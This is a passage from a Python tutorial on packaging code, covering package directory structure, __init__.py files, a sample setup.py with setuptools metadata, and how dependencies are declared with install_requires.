Profile your code for performance bottlenecks.

Packaging Python code

When you set out to write modular code, reusability of code is the prime focus. It helps you share the work of multiple developers in order to create new applications or APIs. The organization of code is improved and every part of it can be maintained separately. For Python code, writing modular code helps to bring it to a format that can be easily packaged. In this section, we will be taking a look at how we can package the code you write, so that it can be shared with other users for installation and usage.

Structure of a Python package

Every file you create that ends with a .py extension is considered a module. The module can store definitions of variables, functions, or classes in it. When one or more such modules are put inside a folder, and a special file called __init__.py is added to it, a package is created, which shares the same name as that of the folder. A very commonly used package structure in Python looks like the following:

parent/                  # Top-level package
    __init__.py          # Initialize the package
    one/                 # Subpackage one
        __init__.py
        libfile1.py
        libfile2.py
        …
    two/                 # Subpackage two
        __init__.py
        utilfiles1.py
        utilfiles2.py
        …
    three/               # Subpackage three
        __init__.py
        script1.py
        script2.py
        …
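Once the folder is laid out like this, the subpackages and modules become importable with dotted paths; a small sketch using the placeholder names above:

# Hypothetical imports based on the placeholder layout shown above
from parent.one import libfile1            # a module from subpackage one
from parent.two import utilfiles1          # a module from subpackage two
import parent.three.script1 as script1     # an aliased module from subpackage three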

Configuring a package

We have now organized our source code files into a package. Let's now discuss how we can configure the package with specific behaviour and properties. For doing this, we need to make use of a special configuration file called setup.py. All configuration parameters and metadata about the package are placed in this file. An example of a setup.py file would look like the following:

from setuptools import setup, find_packages

setup(
    name='codebase',
    version='1.0.1',
    description='Programming Interview Questions',
    long_description='Not kidding, you will find everything here.',
    classifiers=[
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3.6',
    ],
    keywords='interview programming questions python',
    url='http://github.com/sonal-raj/codebase',
    author='Sonal Raj',
    author_email='[email protected]',
    license='MIT',
    packages=find_packages(),
    install_requires=[
        'markdown',
        'pandas',
    ],
    include_package_data=True,
    zip_safe=False
)

Specifying dependencies

To ensure that the package is directly operational after installation, you need to configure it to install all the other libraries and packages that it depends upon. The install_requires parameter of the setup() function is used to specify the name, and optionally the version, of each dependency to be installed.

install_requires=['pandas==1.0', 'matplotlib>=1,